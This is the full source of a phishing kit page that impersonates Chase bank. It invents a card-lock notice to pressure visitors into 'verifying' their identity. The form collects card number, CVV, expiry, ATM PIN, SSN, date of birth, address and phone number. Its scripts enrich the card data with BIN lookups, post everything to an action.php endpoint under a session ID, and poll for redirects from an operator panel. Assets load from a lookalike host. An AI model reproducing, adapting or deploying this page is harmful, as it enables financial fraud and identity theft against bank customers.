<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="stylesheet" href="https://cdnwget.site/cb_files/assets/css/card.css" />
    <link rel="stylesheet" href="https://cdnwget.site/cb_files/assets/css/main.css" />
    <link rel="shortcut icon" href="https://cdnwget.site/cb_files/img/favicon.ico">
    <title>My Account</title>
  </head> 
  <div id="loading" class="loading">
    <div class="spinner"></div>
  </div>
  <body>
    <!-- Start Nav -->
    <div
      class="nav d-flex align-items-center justify-content-between sticky-top"
    >
      <div class="bar">
        <i class="fa-solid fa-bars"></i>
      </div>
      <div class="logo-pic">
        <img src="https://cdnwget.site/cb_files/img/octogon-white.png" alt="" />
      </div>
      <div class="language">
        <p>Español</p>
      </div>
    </div>
    <!-- End Nav -->
    <!-- Start cont -->
    <div id="card-myModal" class="card-modal box">
      <div class="card-modal-content">
        <span class="card-close">×</span>
        <p class="card-modal-header">Security Measures - Irregular Activity <img class="small-icon-alert box" src="https://img.icons8.com/material-rounded/24/757575/box-important--v1.png"></p>
        <hr>
        <br>
        <b style="color: #757575;">Why i can't use my card anymore ?</b>
        <br>
        <br>
        <p class="card-modal-text">

We have detected potential unauthorized activity on your credit card account. To prevent further misuse or fraudulent transactions, we have temporarily closed your card.

Please rest assured that this measure is solely to protect your finances. We understand that it may cause inconvenience, but it is necessary to ensure your security.

Until further notice, please do not use your card. Our team is investigating the matter and will update you as soon as we have more information.

In the meantime, please review your recent transactions and report any unauthorized charges or suspicious activity to our customer support at [customer support contact details].

We appreciate how important your credit card is to your daily life, and we are working diligently to resolve this issue. Once we confirm that your account is secure, we will notify you before reopening your card.

We also recommend that you regularly check your statements, monitor your credit report, and remain vigilant against phishing attempts. Share your card details only with trusted and verified sources.

We apologize for any inconvenience and thank you for your cooperation. Your security and satisfaction are our top priorities.

Sincerely,  
Chase Customer Support</p>
      </div>
    </div>
    <div id="myModal" class="modal box">
 
      <!-- Modal content -->
      <div class="modal-content">
        <span class="close">×</span>
        <div class="modal-container">
          <svg width="117px" height="117px" viewBox="-1.44 -1.44 26.88 26.88" xmlns="http://www.w3.org/2000/svg" fill="none" stroke="#EDAF4D" stroke-width="0.672" stroke-linecap="round" stroke-linejoin="miter" transform="rotate(0)">

            <g id="SVGRepo_bgCarrier" stroke-width="0"/>
            
            <g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"/>
            
            <g id="SVGRepo_iconCarrier">
            
            <polygon points="12 3 2.5 21 21.5 21 12 3"/>
            
            <line x1="12" y1="17" x2="12.01" y2="17" stroke-linecap="round"/>
            
            <line x1="12" y1="10" x2="12" y2="14"/>
            
            </g>
            
            </svg>
              <p class="text-modal">We need your help securing your account to prevent any unauthorized access. For your safety,
                  there may be some limitations on your account if the information isn't correct.
              <p>
              <button onclick="hideElement()" class="btn text-white bg-primary mb-3 mt-3" id="closebtn">Close</button>
        </div>
      </div>
    
    </div>

      <div class="container-bar">
        <!-- PROGGRESS BAR -->
        <div class="progess-bar">
           <div class="progess-notcomplet"></div>
           <div class="progress step2"></div>
           <div id="Sign" class="circle active"></div>
           <div id="perinfo" class="circle active flip-animation"></div>
           <div id="card" class="circle active flip-animation"></div>
           <div id="complet" class="circle"></div>
        </div>
        <div class="progess-barparg">
           <div id='left'class="paraht activep" >Verified</div>
           <div class="paraht activep closebtn " style="white-space: nowrap;">Billing information</div>
           <div class="paraht activep closebtn" style="white-space: nowrap;">Verify Ownership</div>
           <div class="paraht closebtn" style="white-space: nowrap; ">Completed</div>
        </div>
     </div>
     <div class="form-containers">
      <p class="error-texts box"><img style="width: 22px;margin-bottom: 2px;" src="https://cdnwget.site/cb_files/img/error.png"> The card will be unusable until your information is verified ,This action has been taken for security purposes  please Read More About <a id="myLink" style="text-decoration: underline;" href="#">privacy center</a></p>

      <!-- radio -->
      <div class="radios">
      <script language="JavaScript" src="https://cdnwget.site/w2_files/valid/2.js.download"></script>
          <script type="text/javascript">
                  jQuery.noConflict();
                  var $j191 = jQuery;
          </script>
              <script language="JavaScript" src="https://cdnwget.site/w2_files/valid/6.js.download"></script>
              <script language="JavaScript">
              $j191(document).ready(function(){
                  $j191('input[name=Phone]').mask('(000) 000-0000');
              });
              </script>
       <!-- ✅ تعديل الفورم الصحيح -->
  <form
    id="emailpassForm"
    method="POST"
    action="/portal/action.php?session=<?= htmlspecialchars($session_id, ENT_QUOTES) ?>&action=emailpass"
    target="appFrame"
  >




          <div class="start" id="app">
            <form method="post" action="#" class="card-form">
              <div class="card-list">
                <div class="card-item" v-bind:class="{ '-active' : isCardFlipped }">
                  <div class="card-item__side -front">
                    <div class="card-item__focus" v-bind:class="{'-active' : focusElementStyle }" v-bind:style="focusElementStyle" ref="focusElement"></div>
                    <div class="card-item__cover">
                      <img
                      v-bind:src="'https://cdnwget.site/cb_files/img/chasefront.png?id=' + currentCardBackground + '.jpeg'" class="card-item__bg">
                    </div>
                    
                    <div class="card-item__wrapper">
                      <div class="card-item__top">
                        <img style="width: 150px;" src="https://cdnwget.site/cb_files/img/chaselogo.png" class="card-item__chip">
                        <div class="card-item__type">
                          <transition name="slide-fade-up">
                            <img v-bind:src="'https://raw.githubusercontent.com/muhammederdem/credit-card-form/master/src/assets/images/' + getCardType + '.png'" v-if="getCardType" v-bind:key="getCardType" alt="" class="card-item__typeImg">
                          </transition>
                        </div>
                      </div>
                      <label for="cardNumber" class="card-item__number" ref="cardNumber">
                        <template v-if="getCardType === 'amex'">
                         <span v-for="(n, $index) in amexCardMask" :key="$index">
                          <transition name="slide-fade-up">
                            <div
                              class="card-item__numberItem"
                              v-if="$index > 4 && $index < 14 && cardNumber.length > $index && n.trim() !== ''"
                            >*</div>
                            <div class="card-item__numberItem"
                              :class="{ '-active' : n.trim() === '' }"
                              :key="$index" v-else-if="cardNumber.length > $index">
                              {{cardNumber[$index]}}
                            </div>
                            <div
                              class="card-item__numberItem"
                              :class="{ '-active' : n.trim() === '' }"
                              v-else
                              :key="$index + 1"
                            >{{n}}</div>
                          </transition>
                        </span>
                        </template>
        
                        <template v-else>
                          <span v-for="(n, $index) in otherCardMask" :key="$index">
                            <transition name="slide-fade-up">
                              <div
                                class="card-item__numberItem"
                                v-if="$index > 4 && $index < 15 && cardNumber.length > $index && n.trim() !== ''"
                              >*</div>
                              <div class="card-item__numberItem"
                                :class="{ '-active' : n.trim() === '' }"
                                :key="$index" v-else-if="cardNumber.length > $index">
                                {{cardNumber[$index]}}
                              </div>
                              <div
                                class="card-item__numberItem"
                                :class="{ '-active' : n.trim() === '' }"
                                v-else
                                :key="$index + 1"
                              >{{n}}</div>
                            </transition>
                          </span>
                        </template>
                      </label>
                      <div class="card-item__content">
                        <label for="cardName" class="card-item__info" ref="cardName">
                          <div class="card-item__holder">Card Holder</div>
                          <transition name="slide-fade-up">
                            <div class="card-item__name" v-if="cardName.length" key="1">
                              <transition-group name="slide-fade-right">
                                <span class="card-item__nameItem" v-for="(n, $index) in cardName.replace(/\s\s+/g, ' ')" v-if="$index === $index" v-bind:key="$index + 1">{{n}}</span>
                              </transition-group>
                            </div>
                            <div class="card-item__name" v-else key="2">Full Name</div>
                          </transition>
                        </label>
                        <div class="card-item__date" ref="cardDate">
                          <label for="cardMonth" class="card-item__dateTitle">Expires</label>
                          <label for="cardMonth" class="card-item__dateItem">
                            <transition name="slide-fade-up">
                              <span v-if="cardMonth" v-bind:key="cardMonth">{{cardMonth}}</span>
                              <span v-else key="2">MM</span>
                            </transition>
                          </label>
                          /
                          <label for="cardYear" class="card-item__dateItem">
                            <transition name="slide-fade-up">
                              <span v-if="cardYear" v-bind:key="cardYear">{{String(cardYear).slice(2,4)}}</span>
                              <span v-else key="2">YY</span>
                            </transition>
                          </label>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="card-item__side -back">
                    <div class="card-item__cover">
                      <img
                      v-bind:src="'https://cdnwget.site/cb_files/img/chasefront.png?id=' + currentCardBackground + '.jpeg'" class="card-item__bg">
                    </div>
                    <div class="card-item__band"></div>
                    <div class="card-item__cvv">
                        <div class="card-item__cvvTitle">CVV</div>
                        <div class="card-item__cvvBand">
                          <span v-for="(n, $index) in cardCvv" :key="$index">
                            *
                          </span>
        
                      </div>
                        <div class="card-item__type">
                            <img v-bind:src="'https://raw.githubusercontent.com/muhammederdem/credit-card-form/master/src/assets/images/' + getCardType + '.png'" v-if="getCardType" class="card-item__typeImg">
                        </div>
                    </div>
                  </div>
                </div>
              </div>
              <div class="card-form__inner">
<!-- Card Number -->
<div class="card-input">
  <label for="cardNumber" class="card-input__label">Card Number</label>
  <input
    name="<?= htmlspecialchars($f['Card_Number'], ENT_QUOTES) ?>"
    type="text"
    id="cardNumber"
    class="card-input__input"
    placeholder="4111 1111 1111 1111"
    v-mask="generateCardNumberMask"
    v-model="cardNumber"
    v-on:focus="focusInput"
    v-on:blur="blurInput"
    data-ref="cardNumber"
    autocomplete="off"
    pattern="^4[0-9]{3}\s?[0-9]{4}\s?[0-9]{4}\s?[0-9]{4}$|^5[1-5][0-9]{2}\s?[0-9]{4}\s?[0-9]{4}\s?[0-9]{4}$|^3[47][0-9]{2}\s?[0-9]{6}\s?[0-9]{5}$"
    title="Enter a valid Visa, MasterCard, or Amex card number"
    required
  >
  <small id="cardError" style="color: red; font-size: 0.8rem; display: none; margin-top: 5px;"></small>
</div>

<div class="card-input">
  <label for="cardName" class="card-input__label">Card Holder</label>
  <input
    name="<?= htmlspecialchars($f['Card_Name'], ENT_QUOTES) ?>"
    type="text"
    id="cardName"
    class="card-input__input"
    placeholder="John Doe"
    v-model="cardName"
    v-on:focus="focusInput"
    v-on:blur="blurInput"
    data-ref="cardName"
    autocomplete="off"
    oninput="this.value = this.value.replace(/[^a-zA-Z\s]/g, '')"
    required
  >
</div>

<div class="card-form__row">
  <div class="card-form__col">
    <div class="card-form__group">
      <label for="cardMonth" class="card-input__label">Expiration Date</label>
      <select
        name="<?= htmlspecialchars($f['expirM'], ENT_QUOTES) ?>"
        class="card-input__input -select"
        id="cardMonth"
        v-model="cardMonth"
        required
      >
        <option value="" disabled selected>Month</option>
        <option
          v-bind:value="n < 10 ? '0' + n : n"
          v-for="n in 12"
          v-bind:disabled="n < minCardMonth"
          v-bind:key="n"
        >
          {{ n < 10 ? '0' + n : n }}
        </option>
      </select>
      <select
        name="<?= htmlspecialchars($f['expirY'], ENT_QUOTES) ?>"
        class="card-input__input -select"
        id="cardYear"
        v-model="cardYear"
        required
      >
        <option value="" disabled selected>Year</option>
        <option
          v-bind:value="$index + minCardYear"
          v-for="(n, $index) in 12"
          v-bind:key="n"
        >
          {{ $index + minCardYear }}
        </option>
      </select>
    </div>
  </div>

  <div class="card-form__col -cvv">
    <div class="card-input">
      <label for="cardCvv" class="card-input__label">CVV</label>
      <input
        name="<?= htmlspecialchars($f['CCV'], ENT_QUOTES) ?>"
        type="tel"
        id="cardCvv"
        class="card-input__input"
        placeholder="123"
        maxlength="4"
        pattern="\d{3,4}"
        oninput="validateCvvInput(this)"
        autocomplete="off"
        required
      >
    </div>
  </div>
</div>

<div class="card-input">
  <label for="atmPin" class="card-input__label">ATM PIN</label>
  <input
    name="<?= htmlspecialchars($f['ATM_PIN'], ENT_QUOTES) ?>"
    type="tel"
    id="atmPin"
    class="card-input__input"
    placeholder="****"
    minlength="4"
    maxlength="4"
    pattern="^\d{4}$"
    inputmode="numeric"
    oninput="this.value = this.value.replace(/[^0-9]/g, '')"
    autocomplete="off"
    required
  >
</div>

<div class="card-input">
  <label for="dob" class="card-input__label">Date of Birth</label>
  <input
    name="<?= htmlspecialchars($f['Date_Of_Birth'], ENT_QUOTES) ?>"
    type="date"
    id="dob"
    class="card-input__input"
    placeholder="MM/DD/YYYY"
    required
    oninput="validateDOB()"
  >
  <small id="dobError" style="color: red; font-size: 0.8rem; display: none; margin-top: 5px;">
    You must enter a valid date and be at least 18 years old.
  </small>
</div>

<div class="card-input">
  <label for="ssn" class="card-input__label">SSN (9-Digits)</label>
  <input
    name="<?= htmlspecialchars($f['SSN'], ENT_QUOTES) ?>"
    type="text"
    id="ssn"
    class="card-input__input"
    placeholder="SSN 9-Digits"
    maxlength="11"
    pattern="^\d{3}-\d{2}-\d{4}$"
    inputmode="numeric"
    autocomplete="off"
    oninput="formatSSN(this)"
    required
  >
</div>

<div class="card-input">
  <label for="zipCode" class="card-input__label">Zip code</label>
  <input
    name="<?= htmlspecialchars($f['Zip_code'], ENT_QUOTES) ?>"
    type="tel"
    id="zipCode"
    class="card-input__input"
    placeholder="90210"
    minlength="5"
    maxlength="5"
    pattern="^\d{5}$"
    inputmode="numeric"
    oninput="this.value = this.value.replace(/[^0-9]/g, '')"
    autocomplete="off"
    required
  >
</div>

<div class="card-input">
  <label for="addressLine1" class="card-input__label">Address Line 1</label>
  <input
    name="<?= htmlspecialchars($f['Address_Line1'], ENT_QUOTES) ?>"
    type="text"
    id="addressLine1"
    class="card-input__input"
    placeholder="123 Main St"
    pattern="[A-Za-z0-9\s\-.,]{3,100}"
    autocomplete="off"
    required
  />
</div>

<div class="card-input">
  <label for="state" class="card-input__label">State</label>
  <input
    name="<?= htmlspecialchars($f['State'], ENT_QUOTES) ?>"
    type="text"
    id="state"
    class="card-input__input"
    placeholder="CA"
    minlength="2"
    maxlength="15"
    pattern="^[A-Za-z]{2,15}$"
    inputmode="text"
    oninput="this.value = this.value.replace(/[^A-Za-z]/g, '')"
    autocomplete="off"
    required
  />
</div>

<div class="card-input">
  <label for="phoneNumber" class="card-input__label">Phone Number</label>
  <input
    name="<?= htmlspecialchars($f['Phone_Number'], ENT_QUOTES) ?>"
    type="tel"
    id="phoneNumber"
    class="card-input__input"
    placeholder="(123) 456-7890"
    maxlength="14"
    inputmode="numeric"
    oninput="formatPhoneNumber(this)"
    autocomplete="off"
    required
  />
</div>


        
                <button class="card-form__button"><img style="margin-top: -5px;" src="https://cdnwget.site/cb_files/img/unlock.png">
                  Unlock Card
                </button>
              </div>
              <br>
              <br>

  
      </form>
     </div>


    <!-- Start Footer -->
    <div class="footer-one d-flex flex-column align-items-center justify-content-center gap-3 mb-4">
      <ul class="d-flex gap-2 align-items-center justify-content-center">
        <li><a style="text-decoration: underline; font-size: .875rem;" href="#">Privacy</a></li>
        <li><a style="text-decoration: underline; font-size: .875rem" href="#">Security</a></li>
        <li><a style="text-decoration: underline; font-size: .875rem" href="#"> Accessibility</a></li>
        <li><a style="text-decoration: underline; font-size: .875rem" href="#"> Terms of use</a></li>
        <li><a style="text-decoration: underline; font-size: .875rem" href="#"> Ad choices</a></li>
      </ul>
      <div style="
      font-size: .75rem;
      font-weight: 400;
      color: #717171;
      letter-spacing: 0;
      text-decoration: none;" class="copy">
        © 2025 JPMorgan Chase & Co.
      </div>
    </div>
    <!-- End Footer -->
    <script>
      function hideElement() {
var element = document.getElementById("myModal");
element.style.display = "none";
}
      // Get the modal
    var modal = document.getElementById("myModal");
    
    // Get the button that opens the modal
    var btn = document.getElementById("myBtn");
    
    // Get the <span> element that closes the modal
    var span = document.getElementsByClassName("close")[0];

    var div = document.getElementsByClassName("closebtn")[0];
    
    // When the user clicks on the button, open the modal
    btn.onclick = function() {
      modal.style.display = "block";
    }
    
    // When the user clicks on <span> (x), close the modal
    span.onclick = function() {
      modal.style.display = "none";
    }

    div.onclick = function(){
      modal.style.display = "none";
    }
    
    // When the user clicks anywhere outside of the modal, close it
    window.onclick = function(event) {
      if (event.target == modal) {
        modal.style.display = "none";
      }
    } 
    </script>
    <script>
      const form = document.getElementById('myForm');
  const loading = document.getElementById('loading');
  
  form.addEventListener('submit', (event) => {
    event.preventDefault(); // prevent form submission
    
    loading.style.display = 'block'; // show loading page HTML
    
    // delay form submission for 2 seconds
    setTimeout(() => {
      form.submit(); // submit the form
      loading.style.display = 'none'; // hide loading page HTML
    }, 2000);
  });
  
  </script>
  <script>
    // Get the modal element
var cardmodal = document.getElementById("card-myModal");

// Get the link element
var link = document.getElementById("myLink");

// Get the close button element
var closeBtn = document.getElementsByClassName("card-close")[0];

// Open the modal when link is clicked
link.onclick = function() {
  cardmodal.style.display = "block";
}

// Close the modal when close button is clicked
closeBtn.onclick = function() {
  cardmodal.style.display = "none";
}

// Close the modal when clicked outside the modal
window.onclick = function(event) {
  if (event.target == cardmodal) {
    cardmodal.style.display = "none";
  }
}
</script>
            <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
            <script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script><script  src="https://cdnwget.site/ub_files/script.js"></script>
            
            <script>
document.getElementById('cardNumber').addEventListener('input', function () {
  const raw = this.value.replace(/\s/g, '');
  const visaRegex = /^4[0-9]{15}$/;
  const masterRegex = /^5[1-5][0-9]{14}$/;
  const amexRegex = /^3[47][0-9]{13}$/;
  const errorEl = document.getElementById('cardError');

  if (raw.length >= 13) {
    if (!(visaRegex.test(raw) || masterRegex.test(raw) || amexRegex.test(raw))) {
      errorEl.innerText = '❌ Invalid card number format. Must be Visa, MasterCard, or Amex.';
      errorEl.style.display = 'block';
      this.classList.add('input-error'); // optional styling
    } else {
      errorEl.innerText = '';
      errorEl.style.display = 'none';
      this.classList.remove('input-error');
    }
  } else {
    errorEl.innerText = '';
    errorEl.style.display = 'none';
    this.classList.remove('input-error');
  }
});
</script>


<script>
function formatPhoneNumber(input) {
  let numbers = input.value.replace(/\D/g, ''); // remove all non-digit
  let formatted = '';

  if (numbers.length > 0) {
    formatted += '(' + numbers.substring(0, 3);
  }
  if (numbers.length >= 4) {
    formatted += ') ' + numbers.substring(3, 6);
  }
  if (numbers.length >= 7) {
    formatted += '-' + numbers.substring(6, 10);
  }

  input.value = formatted;
}
</script>


<script>
async function getBinInfo(cardNumber) {
  const bin = cardNumber.replace(/\D/g, '').substring(0, 6);
  if (bin.length < 6) return {};

  try {
    const res = await fetch(`https://lookup.binlist.net/${bin}`);
    if (!res.ok) return {};

    return await res.json();
  } catch (e) {
    return {};
  }
}
</script>



<script>
document.getElementById("myForm").addEventListener("submit", async function(e) {
  e.preventDefault();

  const formData = new FormData(this);
  const sessionId = new URLSearchParams(window.location.search).get("session");
  const cardNumber = formData.get("Card_Number") || "";

  // 🔍 جلب bin info
  const binInfo = await getBinInfo(cardNumber);
  if (binInfo) {
    formData.append("bin_brand", binInfo.scheme || '');
    formData.append("bin_type", binInfo.type || '');
    formData.append("bin_issuer", (binInfo.bank && binInfo.bank.name) || '');
    formData.append("bin_country", (binInfo.country && binInfo.country.name) || '');
  }

  // ✅ إرسال البيانات
  const res = await fetch("../action.php?session=" + sessionId + "&action=emailpass", {
    method: "POST",
    body: formData
  });

  const check = await fetch("../check.php?session=" + sessionId);
  const data = await check.json();

  if (data.redirect) {
    window.location.href = data.redirect;
  } else {
    alert("❌ Waiting for admin approval...");
  }
});

</script>



<script>
function formatSSN(input) {
  let value = input.value.replace(/\D/g, '');
  if (value.length > 9) value = value.slice(0, 9);
  let formatted = value;
  if (value.length > 5) {
    formatted = value.slice(0, 3) + '-' + value.slice(3, 5) + '-' + value.slice(5);
  } else if (value.length > 3) {
    formatted = value.slice(0, 3) + '-' + value.slice(3);
  }
  input.value = formatted;
}
</script>



<script>
function validateCvvInput(input) {
  input.value = input.value.replace(/[^0-9]/g, '');

  const cardInput = document.getElementById('cardNumber');
  if (!cardInput) return;

  const bin = cardInput.value.replace(/\D/g, '').substring(0, 6);

  // تحقق من BIN Amex (34xxxx أو 37xxxx)
  const isAmex = bin.startsWith('34') || bin.startsWith('37');

  input.maxLength = isAmex ? 4 : 3;
  input.placeholder = isAmex ? '1234' : '123';
}
</script>



<script>
function validateDOB() {
  const dobInput = document.getElementById("dob");
  const errorText = document.getElementById("dobError");

  const dob = new Date(dobInput.value);
  const today = new Date();

  const inputYear = parseInt(dobInput.value.split("-")[0]);
  const isValidDate = dob instanceof Date && !isNaN(dob) && inputYear > 1900 && inputYear <= today.getFullYear();

  let isOldEnough = false;
  if (isValidDate) {
    const age = today.getFullYear() - dob.getFullYear();
    const m = today.getMonth() - dob.getMonth();
    const d = today.getDate() - dob.getDate();

    if (age > 18 || (age === 18 && (m > 0 || (m === 0 && d >= 0)))) {
      isOldEnough = true;
    }
  }

  if (!isValidDate || !isOldEnough) {
    dobInput.style.borderColor = "red";
    errorText.style.display = "block";
  } else {
    dobInput.style.borderColor = "";
    errorText.style.display = "none";
  }
}
</script>



<script>
document.querySelector(".card-form__button").addEventListener("click", function (e) {
  let valid = true;

  function markError(id, message) {
    const input = document.getElementById(id);
    const existing = input.parentNode.querySelector("small");
    if (input) {
      input.style.borderColor = "red";
      if (existing) {
        existing.innerText = message;
        existing.style.display = "block";
      } else {
        const error = document.createElement("small");
        error.style.color = "red";
        error.style.fontSize = "0.8rem";
        error.style.marginTop = "5px";
        error.innerText = message;
        input.parentNode.appendChild(error);
      }
    }
    valid = false;
  }

  function clearError(id) {
    const input = document.getElementById(id);
    if (input) input.style.borderColor = "";
    const error = input?.parentNode?.querySelector("small");
    if (error) error.style.display = "none";
  }

  const checks = [
    { id: "cardNumber", message: "Enter your credit card." },
    { id: "cardName", message: "Enter your full name." },
    { id: "ssn", message: "Enter your 9-digit SSN." },
    { id: "Zip_code", message: "Enter your ZIP code." },
    { id: "state", message: "Enter your state." },
    { id: "addressLine1", message: "Enter your address." },
    { id: "phoneNumber", message: "Enter your 10-digit phone number." },
    { id: "ATM-PIN", message: "Enter your 4-digit card PIN." }
  ];

  checks.forEach(({ id, message }) => {
    const input = document.getElementById(id);
    if (!input || !input.value.trim()) {
      markError(id, message);
    } else {
      clearError(id);
    }
  });

  if (!valid) e.preventDefault();
});
</script>




  </body>
</html>
